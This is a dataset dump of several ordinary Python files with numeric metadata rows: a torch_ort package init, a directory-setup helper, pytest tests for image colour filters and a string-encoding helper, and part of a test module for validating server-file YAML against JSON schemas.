| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
979cf2d4987ad6d61141b5095063f9e1f3cc16bc
| 334
|
py
|
Python
|
torch_ort/__init__.py
|
ashari4/ort
|
4e1a654a23fe8f73d6702bb49694f7e793059989
|
[
"MIT"
] | null | null | null |
torch_ort/__init__.py
|
ashari4/ort
|
4e1a654a23fe8f73d6702bb49694f7e793059989
|
[
"MIT"
] | null | null | null |
torch_ort/__init__.py
|
ashari4/ort
|
4e1a654a23fe8f73d6702bb49694f7e793059989
|
[
"MIT"
] | null | null | null |
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# --------------------------------------------------------------------------
from onnxruntime.training.ortmodule import ORTModule
from onnxruntime import set_seed
| 41.75
| 76
| 0.446108
| 23
| 334
| 6.434783
| 0.826087
| 0.202703
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.080838
| 334
| 7
| 77
| 47.714286
| 0.482085
| 0.712575
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8ae690f5da4ecb026c964166afbb3290b5251e1e
| 166
|
py
|
Python
|
cloudcopy/server/setup.py
|
cloud-copy/server
|
1b4470adc3cfdadf7a5846667a4c905afa3ab1c3
|
[
"MIT"
] | null | null | null |
cloudcopy/server/setup.py
|
cloud-copy/server
|
1b4470adc3cfdadf7a5846667a4c905afa3ab1c3
|
[
"MIT"
] | 1
|
2020-09-25T02:24:45.000Z
|
2020-09-25T02:24:45.000Z
|
cloudcopy/server/setup.py
|
cloud-copy/core
|
1b4470adc3cfdadf7a5846667a4c905afa3ab1c3
|
[
"MIT"
] | null | null | null |
import os
from .config import settings
def setup_environment():
    """Create the application's base and log directories if absent."""
    # exist_ok keeps repeated startup calls idempotent.
    for directory in (settings.BASE_PATH, settings.LOG_PATH):
        os.makedirs(directory, exist_ok=True)
| 23.714286
| 50
| 0.777108
| 25
| 166
| 4.96
| 0.6
| 0.16129
| 0.290323
| 0.241935
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126506
| 166
| 6
| 51
| 27.666667
| 0.855172
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c139e327255d0b592b9ad110fc033a6fa4ed36f8
| 6,570
|
py
|
Python
|
test_image_manipulation.py
|
shequin-joshua-9147/cs162-final-project
|
0edff7170ca0761b38c30774475bfecac2a18f01
|
[
"MIT"
] | null | null | null |
test_image_manipulation.py
|
shequin-joshua-9147/cs162-final-project
|
0edff7170ca0761b38c30774475bfecac2a18f01
|
[
"MIT"
] | null | null | null |
test_image_manipulation.py
|
shequin-joshua-9147/cs162-final-project
|
0edff7170ca0761b38c30774475bfecac2a18f01
|
[
"MIT"
] | null | null | null |
"""
Pytest the ImageStuff module.
Joshua Shequin
"""
from image_manipulation import ImageO
import numpy as np
"""
BASE IMAGE
np.array([[[255, 0, 0, 255], [0, 255, 0, 255], [0, 0, 255, 255], [255, 255, 255, 255]],
[[0, 0, 0, 255], [0, 0 ,0, 255], [255, 255, 255, 255], [255, 255, 255, 255]],
[[255, 255, 255, 255], [0, 0, 255, 255], [0, 255, 0, 255], [255, 0, 0, 255]],
[[247, 248, 255, 255], [255, 255, 255, 255], [0, 0, 0, 255], [0, 0, 0, 255]]])
"""
def test_clear_red():
    """clear_red zeroes the R component of every pixel (expected array has 0 in column 0 throughout)."""
    io = ImageO("images/test_picture.png")
    test_case = np.array([[[0, 0, 0, 255], [0, 255, 0, 255], [0, 0, 255, 255], [0, 255, 255, 255]],
                          [[0, 0, 0, 255], [0, 0, 0, 255], [0, 255, 255, 255], [0, 255, 255, 255]],
                          [[0, 255, 255, 255], [0, 0, 255, 255], [0, 255, 0, 255], [0, 0, 0, 255]],
                          [[0, 248, 255, 255], [0, 255, 255, 255], [0, 0, 0, 255], [0, 0, 0, 255]]])
    assert (io.clear_red("", returnable=True) == test_case).all()
def test_clear_green():
    """clear_green zeroes the G component of every pixel (column 1 is 0 throughout the expected array)."""
    io = ImageO("images/test_picture.png")
    test_case = np.array([[[255, 0, 0, 255], [0, 0, 0, 255], [0, 0, 255, 255], [255, 0, 255, 255]],
                          [[0, 0, 0, 255], [0, 0, 0, 255], [255, 0, 255, 255], [255, 0, 255, 255]],
                          [[255, 0, 255, 255], [0, 0, 255, 255], [0, 0, 0, 255], [255, 0, 0, 255]],
                          [[247, 0, 255, 255], [255, 0, 255, 255], [0, 0, 0, 255], [0, 0, 0, 255]]])
    assert (io.clear_green("", returnable=True) == test_case).all()
def test_clear_blue():
    """clear_blue zeroes the B component of every pixel (column 2 is 0 throughout the expected array)."""
    io = ImageO("images/test_picture.png")
    test_case = np.array([[[255, 0, 0, 255], [0, 255, 0, 255], [0, 0, 0, 255], [255, 255, 0, 255]],
                          [[0, 0, 0, 255], [0, 0, 0, 255], [255, 255, 0, 255], [255, 255, 0, 255]],
                          [[255, 255, 0, 255], [0, 0, 0, 255], [0, 255, 0, 255], [255, 0, 0, 255]],
                          [[247, 248, 0, 255], [255, 255, 0, 255], [0, 0, 0, 255], [0, 0, 0, 255]]])
    assert (io.clear_blue("", returnable=True) == test_case).all()
def test_only_red():
    """red_only keeps R (and alpha) and zeroes G and B in the expected array."""
    io = ImageO("images/test_picture.png")
    test_case = np.array([[[255, 0, 0, 255], [0, 0, 0, 255], [0, 0, 0, 255], [255, 0, 0, 255]],
                          [[0, 0, 0, 255], [0, 0, 0, 255], [255, 0, 0, 255], [255, 0, 0, 255]],
                          [[255, 0, 0, 255], [0, 0, 0, 255], [0, 0, 0, 255], [255, 0, 0, 255]],
                          [[247, 0, 0, 255], [255, 0, 0, 255], [0, 0, 0, 255], [0, 0, 0, 255]]])
    assert (io.red_only("", returnable=True) == test_case).all()
def test_only_green():
    """green_only keeps G (and alpha) and zeroes R and B in the expected array."""
    io = ImageO("images/test_picture.png")
    test_case = np.array([[[0, 0, 0, 255], [0, 255, 0, 255], [0, 0, 0, 255], [0, 255, 0, 255]],
                          [[0, 0, 0, 255], [0, 0, 0, 255], [0, 255, 0, 255], [0, 255, 0, 255]],
                          [[0, 255, 0, 255], [0, 0, 0, 255], [0, 255, 0, 255], [0, 0, 0, 255]],
                          [[0, 248, 0, 255], [0, 255, 0, 255], [0, 0, 0, 255], [0, 0, 0, 255]]])
    assert (io.green_only("", returnable=True) == test_case).all()
def test_only_blue():
    """blue_only keeps B (and alpha) and zeroes R and G in the expected array."""
    io = ImageO("images/test_picture.png")
    test_case = np.array([[[0, 0, 0, 255], [0, 0, 0, 255], [0, 0, 255, 255], [0, 0, 255, 255]],
                          [[0, 0, 0, 255], [0, 0, 0, 255], [0, 0, 255, 255], [0, 0, 255, 255]],
                          [[0, 0, 255, 255], [0, 0, 255, 255], [0, 0, 0, 255], [0, 0, 0, 255]],
                          [[0, 0, 255, 255], [0, 0, 255, 255], [0, 0, 0, 255], [0, 0, 0, 255]]])
    assert (io.blue_only("", returnable=True) == test_case).all()
def test_lower_half():
    """lower_half floors each RGB component to half (255->127, 247->123), alpha untouched."""
    io = ImageO("images/test_picture.png")
    test_case = np.array([[[127, 0, 0, 255], [0, 127, 0, 255], [0, 0, 127, 255], [127, 127, 127, 255]],
                          [[0, 0, 0, 255], [0, 0, 0, 255], [127, 127, 127, 255], [127, 127, 127, 255]],
                          [[127, 127, 127, 255], [0, 0, 127, 255], [0, 127, 0, 255], [127, 0, 0, 255]],
                          [[123, 124, 127, 255], [127, 127, 127, 255], [0, 0, 0, 255], [0, 0, 0, 255]]])
    assert (io.lower_half("", returnable=True) == test_case).all()
def test_upper_half():
    """upper_half maps each component into the upper range (expected values match x//2 + 128: 0->128, 247->251)."""
    io = ImageO("images/test_picture.png")
    test_case = np.array([[[255, 128, 128, 255], [128, 255, 128, 255], [128, 128, 255, 255], [255, 255, 255, 255]],
                          [[128, 128, 128, 255], [128, 128, 128, 255], [255, 255, 255, 255], [255, 255, 255, 255]],
                          [[255, 255, 255, 255], [128, 128, 255, 255], [128, 255, 128, 255], [255, 128, 128, 255]],
                          [[251, 252, 255, 255], [255, 255, 255, 255], [128, 128, 128, 255], [128, 128, 128, 255]]])
    assert (io.upper_half("", returnable=True) == test_case).all()
def test_gray_scale():
    """gray_scale replaces R, G and B with their mean (e.g. (255+0+0)//3 == 85), alpha untouched."""
    io = ImageO("images/test_picture.png")
    test_case = np.array([[[85, 85, 85, 255], [85, 85, 85, 255], [85, 85, 85, 255], [255, 255, 255, 255]],
                          [[0, 0, 0, 255], [0, 0, 0, 255], [255, 255, 255, 255], [255, 255, 255, 255]],
                          [[255, 255, 255, 255], [85, 85, 85, 255], [85, 85, 85, 255], [85, 85, 85, 255]],
                          [[250, 250, 250, 255], [255, 255, 255, 255], [0, 0, 0, 255], [0, 0, 0, 255]]])
    assert (io.gray_scale("", returnable=True) == test_case).all()
def test_invert_color():
    """invert_color maps each RGB component to 255 - x (247 -> 8); alpha stays 255."""
    io = ImageO("images/test_picture.png")
    test_case = np.array([[[0, 255, 255, 255], [255, 0, 255, 255], [255, 255, 0, 255], [0, 0, 0, 255]],
                          [[255, 255, 255, 255], [255, 255, 255, 255], [0, 0, 0, 255], [0, 0, 0, 255]],
                          [[0, 0, 0, 255], [255, 255, 0, 255], [255, 0, 255, 255], [0, 255, 255, 255]],
                          [[8, 7, 0, 255], [0, 0, 0, 255], [255, 255, 255, 255], [255, 255, 255, 255]]])
    assert (io.invert_color("", returnable=True) == test_case).all()
def test_block():
    """block_image on a 4x4 image uses 1-pixel blocks, so the output equals the input."""
    io = ImageO("images/test_picture.png")
    # in this case since it is 4x4 it will just block it by 1 pixel blocks and so not do anything
    test_case = np.array([[[255, 0, 0, 255], [0, 255, 0, 255], [0, 0, 255, 255], [255, 255, 255, 255]],
                          [[0, 0, 0, 255], [0, 0, 0, 255], [255, 255, 255, 255], [255, 255, 255, 255]],
                          [[255, 255, 255, 255], [0, 0, 255, 255], [0, 255, 0, 255], [255, 0, 0, 255]],
                          [[247, 248, 255, 255], [255, 255, 255, 255], [0, 0, 0, 255], [0, 0, 0, 255]]])
    assert (io.block_image("", returnable=True) == test_case).all()
| 51.328125
| 116
| 0.454033
| 1,060
| 6,570
| 2.751887
| 0.066981
| 0.353788
| 0.333219
| 0.31265
| 0.886184
| 0.851903
| 0.842304
| 0.81385
| 0.729859
| 0.686664
| 0
| 0.359238
| 0.304718
| 6,570
| 127
| 117
| 51.732283
| 0.279335
| 0.021005
| 0
| 0.164557
| 0
| 0
| 0.041804
| 0.041804
| 0
| 0
| 0
| 0
| 0.139241
| 1
| 0.139241
| false
| 0
| 0.025316
| 0
| 0.164557
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
a9aa6670594291b264801f948cbae934042b2ee2
| 1,210
|
py
|
Python
|
pymicropel/test/test_helper/test_crypto.py
|
vkorecky/pymicropel
|
9333ba1d691664a01d0ec63f89ae13956f37d633
|
[
"Apache-2.0"
] | null | null | null |
pymicropel/test/test_helper/test_crypto.py
|
vkorecky/pymicropel
|
9333ba1d691664a01d0ec63f89ae13956f37d633
|
[
"Apache-2.0"
] | null | null | null |
pymicropel/test/test_helper/test_crypto.py
|
vkorecky/pymicropel
|
9333ba1d691664a01d0ec63f89ae13956f37d633
|
[
"Apache-2.0"
] | null | null | null |
"""Test of cryptography."""
from pymicropel.helper.crypto import Crypto
def test_encrypt_decrypt_test():
    """Test encoding and decoding.

    The same init/encode/assert/decode/assert sequence was copy-pasted
    four times in the original; it is now driven by a table of
    (password, expected ciphertext) pairs. Passwords 0 and -1 are
    expected to leave the string unchanged (identity cipher).
    """
    original_str = "Sww=BRDqXPgX5ytH"
    expected_by_password = [
        (1, "Ffz7WCI{MAjR hyB"),
        (999999, 'Mgf"\\BUnF@vG+ieW'),
        (0, original_str),
        (-1, original_str),
    ]
    cryptography = Crypto()
    for password, expected_str in expected_by_password:
        cryptography.crypt_init(password)
        encoded_str = cryptography.code_string(original_str)
        assert expected_str == encoded_str
        # Round-trip: decoding must always recover the original.
        decoded_str = cryptography.decode_string(encoded_str)
        assert original_str == decoded_str
| 32.702703
| 57
| 0.757851
| 151
| 1,210
| 5.715232
| 0.258278
| 0.13905
| 0.12051
| 0.202781
| 0.741599
| 0.741599
| 0.741599
| 0.741599
| 0.741599
| 0.741599
| 0
| 0.024606
| 0.160331
| 1,210
| 36
| 58
| 33.611111
| 0.824803
| 0.040496
| 0
| 0.538462
| 0
| 0
| 0.042609
| 0
| 0
| 0
| 0
| 0
| 0.307692
| 1
| 0.038462
| false
| 0.153846
| 0.038462
| 0
| 0.076923
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
a9cb7e9cb15bcd92cff640079317e84253e973d1
| 73,023
|
py
|
Python
|
tests/unittest/test_server_file.py
|
andy-maier/secureserveraccess
|
24f4817b2066401451840b3c7b308e1792eb3e60
|
[
"Apache-2.0"
] | 1
|
2021-03-29T22:09:47.000Z
|
2021-03-29T22:09:47.000Z
|
tests/unittest/test_server_file.py
|
andy-maier/secureserveraccess
|
24f4817b2066401451840b3c7b308e1792eb3e60
|
[
"Apache-2.0"
] | 49
|
2021-03-29T20:13:28.000Z
|
2021-05-01T10:38:19.000Z
|
tests/unittest/test_server_file.py
|
andy-maier/secureserveraccess
|
24f4817b2066401451840b3c7b308e1792eb3e60
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Test the _server_file.py module.
"""
from __future__ import absolute_import, print_function
import os
import pytest
from easy_server import ServerFile, ServerFileFormatError, \
ServerFileOpenError, ServerFileUserDefinedFormatError, \
ServerFileUserDefinedSchemaError, ServerFileGroupUserDefinedFormatError, \
ServerFileGroupUserDefinedSchemaError
# White box testing: We test an internal function
from easy_server._server_file import _load_server_file
from ..utils.simplified_test_function import simplified_test_function
from ..utils.server_file_utils import easy_server_file
TEST_SERVERFILE_FILEPATH = 'tests/testfiles/server.yml'
TEST_SERVERFILE_FILEPATH_ABS = os.path.abspath(TEST_SERVERFILE_FILEPATH)
TEST_VAULTFILE_FILEPATH = 'tests/testfiles/vault.yml'
TEST_VAULTFILE_FILEPATH_ABS = os.path.abspath(TEST_VAULTFILE_FILEPATH)
# Standard server and vault files that are dynamically created for testing:
TEST_SERVER_FILENAME = 'server.yml'
TEST_VAULT_FILENAME = 'vault.yml'
TEST_VAULT_PASSWORD = 'vault'
# JSON schema used to validate the user-defined portion of server items in
# test server files: requires exactly one string property "foo" and
# forbids anything else.
FOO_USER_DEFINED_SCHEMA = {
    "$schema": "http://json-schema.org/draft-07/schema#",
    "title": "FOO - JSON schema for user-defined items in server files",
    "type": "object",
    "required": [
        "foo",
    ],
    "additionalProperties": False,
    "properties": {
        "foo": {
            "type": "string",
            "description": "The foo value",
        },
    },
}

# Deliberately broken JSON schema ("object_xxx" is not a valid type) used
# to exercise schema-error handling in the tests.
INVALID_USER_DEFINED_SCHEMA = {
    "$schema": "http://json-schema.org/draft-07/schema#",
    "title": "Invalid JSON schema for user-defined items in server files",
    "type": "object_xxx",
    "additionalProperties": False,
}
TESTCASES_SF_INIT = [
# Testcases for ServerFile.__init__()
# Each list item is a testcase tuple with these items:
# * desc: Short testcase description.
# * kwargs: Keyword arguments for the test function:
# * init_args: Tuple of positional arguments to ServerFile().
# * init_kwargs: Dict of keyword arguments to ServerFile().
# * exp_serverfile_attrs: Dict with expected ServerFile attributes.
# * exp_exc_types: Expected exception type(s), or None.
# * exp_warn_types: Expected warning type(s), or None.
# * condition: Boolean condition for testcase to run, or 'pdb' for debugger
(
"Order of positional parameters",
dict(
init_args=(
TEST_SERVERFILE_FILEPATH,
),
init_kwargs=dict(),
exp_serverfile_attrs={
'filepath': TEST_SERVERFILE_FILEPATH_ABS,
'user_defined_schema': None,
'group_user_defined_schema': None,
'vault_server_schema': None,
},
),
None, None, True
),
(
"Names of keyword arguments",
dict(
init_args=(),
init_kwargs=dict(
filepath=TEST_SERVERFILE_FILEPATH,
),
exp_serverfile_attrs={
'filepath': TEST_SERVERFILE_FILEPATH_ABS,
'user_defined_schema': None,
'group_user_defined_schema': None,
'vault_server_schema': None,
},
),
None, None, True
),
(
"Omitted required parameter: filepath",
dict(
init_args=(),
init_kwargs=dict(),
exp_serverfile_attrs=None,
),
TypeError, None, True
),
(
"File not found",
dict(
init_args=(),
init_kwargs=dict(
filepath='invalid_file',
),
exp_serverfile_attrs=None,
),
(ServerFileOpenError, "Cannot open server file"),
None, True
),
(
"Server file that references vault file",
dict(
init_args=(),
init_kwargs=dict(
filepath=TEST_SERVERFILE_FILEPATH,
),
exp_serverfile_attrs={
'filepath': TEST_SERVERFILE_FILEPATH_ABS,
'vault_file': TEST_VAULTFILE_FILEPATH_ABS,
'user_defined_schema': None,
'group_user_defined_schema': None,
'vault_server_schema': None,
},
),
None, None, True
),
]
@pytest.mark.parametrize(
    "desc, kwargs, exp_exc_types, exp_warn_types, condition",
    TESTCASES_SF_INIT)
@simplified_test_function
def test_ServerFile_init(
        testcase, init_args, init_kwargs, exp_serverfile_attrs):
    """
    Test function for ServerFile.__init__()
    """
    # The code to be tested
    act_obj = ServerFile(*init_args, **init_kwargs)
    # Ensure that exceptions raised in the remainder of this function
    # are not mistaken as expected exceptions
    assert testcase.exp_exc_types is None, \
        "Expected exception not raised: {}". \
        format(testcase.exp_exc_types)
    # Verify that each expected attribute exists on the constructed object
    # and carries the expected value.
    for attr_name in exp_serverfile_attrs:
        exp_attr_value = exp_serverfile_attrs[attr_name]
        assert hasattr(act_obj, attr_name), \
            "Missing attribute {0!r} in returned ServerFile object". \
            format(attr_name)
        act_attr_value = getattr(act_obj, attr_name)
        assert act_attr_value == exp_attr_value, \
            "Unexpected value for attribute {0!r}: Expected {1!r}, got {2!r}".\
            format(attr_name, exp_attr_value, act_attr_value)
TESTCASES_SF_LOAD = [
# Testcases for ServerFile._load_server_file()
# Each list item is a testcase tuple with these items:
# * desc: Short testcase description.
# * kwargs: Keyword arguments for the test function:
# * server_filename: Filename of server file to be created.
# * server_yaml: Content of server file.
# * vault_filename: Filename of vault file to be created, or None.
# * vault_yaml: Content of vault file, or None.
# * vault_password: Password for encryption of vault file, or None.
# * user_defined_schema: JSON schema for validating user-defined portion
# of server items in server file, or None.
# * group_user_defined_schema: JSON schema for validating user-defined
# portion of group items in server file, or None.
# * exp_data: Expected result of _load_server_file()
# * exp_exc_types: Expected exception type(s), or None.
# * exp_warn_types: Expected warning type(s), or None.
# * condition: Boolean condition for testcase to run, or 'pdb' for debugger
# Basic validation
(
"Empty file: Missing required elements",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileFormatError,
"Validation failed on top-level element.* is not of type 'object'"),
None, True
),
(
"Invalid YAML syntax: Mixing list and dict",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" - foo\n"
" bar:\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileFormatError, "Invalid YAML syntax"),
None, True
),
(
"Invalid top-level type list",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="- servers: {}\n"
"- server_groups: {}\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileFormatError,
"Validation failed on top-level element: .* is not of type 'object'"),
None, True
),
(
"Missing required 'servers' element",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="server_groups: {}\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileFormatError,
"Validation failed on top-level element: 'servers' is a required "
"property"),
None, True
),
(
"Invalid type for 'servers' element: list",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" - foo\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileFormatError,
"Validation failed on element 'servers': .* is not of type 'object'"),
None, True
),
(
"Invalid type for 'servers' element: string",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: bla\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileFormatError,
"Validation failed on element 'servers': .* is not of type 'object'"),
None, True
),
(
"Invalid type for 'server_groups' element: list",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n"
"server_groups: []\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileFormatError,
"Validation failed on element 'server_groups': .* is not of type "
"'object'"),
None, True
),
(
"Invalid type for 'server_groups' element: string",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n"
"server_groups: bla\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileFormatError,
"Validation failed on element 'server_groups': .* is not of type "
"'object'"),
None, True
),
(
"Invalid type of server group",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n"
"server_groups:\n"
" grp1: invalid\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileFormatError,
"Validation failed on element 'server_groups.grp1': .* is not of type "
"'object'"),
None, True
),
(
"Missing required element 'description' in server group",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n"
"server_groups:\n"
" grp1:\n"
" members: []\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileFormatError,
"Validation failed on element 'server_groups.grp1': 'description' is "
"a required property"),
None, True
),
(
"Invalid type for element 'description' in server group: list",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n"
"server_groups:\n"
" grp1:\n"
" description: []\n"
" members: []\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileFormatError,
"Validation failed on element 'server_groups.grp1.description': "
".* is not of type 'string'"),
None, True
),
(
"Missing required element 'members' in server group",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n"
"server_groups:\n"
" grp1:\n"
" description: desc1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileFormatError,
"Validation failed on element 'server_groups.grp1': 'members' is "
"a required property"),
None, True
),
(
"Invalid type for element 'members' in server group: string",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n"
"server_groups:\n"
" grp1:\n"
" description: desc1\n"
" members: invalid\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileFormatError,
"Validation failed on element 'server_groups.grp1.members': "
".* is not of type 'array'"),
None, True
),
(
"Invalid type for server group member: dict",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n"
"server_groups:\n"
" grp1:\n"
" description: desc1\n"
" members:\n"
" - {}\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileFormatError,
"Validation failed on element 'server_groups.grp1.members.0': "
".* is not of type 'string'"),
None, True
),
(
"Invalid default null",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n"
"server_groups: {}\n"
"default: null\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileFormatError,
"Validation failed on element 'default': "
"None is not of type 'string'"),
None, True
),
# More semantic errors
(
"Server group member nickname not found",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n"
"server_groups:\n"
" grp1:\n"
" description: desc1\n"
" members:\n"
" - srv1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileFormatError,
"Nickname 'srv1' in server group 'grp1' not found"),
None, True
),
(
"Default nickname not found",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
"server_groups:\n"
" grp1:\n"
" description: desc1\n"
" members:\n"
" - srv1\n"
"default: srv\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileFormatError,
"Default nickname 'srv' not found"),
None, True
),
# Valid simple server files
(
"Valid file with no servers and server_group+default omitted",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data={
'servers': {},
'server_groups': {},
'default': None,
'vault_file': None,
},
),
None, None, True
),
(
"Valid file with one server that is default",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
"default: srv1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data={
'servers': {
'srv1': {
'description': 'server1',
'user_defined': {
'stuff': 42,
},
},
},
'server_groups': {},
'default': 'srv1',
'vault_file': None,
},
),
None, None, True
),
(
"Valid file with one server and one server group that is default",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" members:\n"
" - srv1\n"
"default: grp1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=None,
exp_data={
'servers': {
'srv1': {
'description': 'server1',
'user_defined': {
'stuff': 42,
},
},
},
'server_groups': {
'grp1': {
'description': 'group1',
'members': ['srv1'],
},
},
'default': 'grp1',
'vault_file': None,
},
),
None, None, True
),
# JSON schema validation of user-defined portion of server items
(
"Valid file with no servers but with FOO schema",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=FOO_USER_DEFINED_SCHEMA,
group_user_defined_schema=None,
exp_data={
'servers': {},
'server_groups': {},
'default': None,
'vault_file': None,
},
),
None, None, True
),
(
"Valid file with two servers that satisfy FOO schema",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" foo: bar1\n"
" srv2:\n"
" description: server2\n"
" user_defined:\n"
" foo: bar2\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=FOO_USER_DEFINED_SCHEMA,
group_user_defined_schema=None,
exp_data={
'servers': {
'srv1': {
'description': 'server1',
'user_defined': {
'foo': 'bar1',
},
},
'srv2': {
'description': 'server2',
'user_defined': {
'foo': 'bar2',
},
},
},
'server_groups': {},
'default': None,
'vault_file': None,
},
),
None, None, True
),
(
"Valid file with one server that misses user_defined element and FOO "
"schema",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=FOO_USER_DEFINED_SCHEMA,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileUserDefinedFormatError,
"Missing user_defined element for server srv1"),
None, True
),
(
"Valid file with one server that misses property required in FOO "
"schema",
dict(
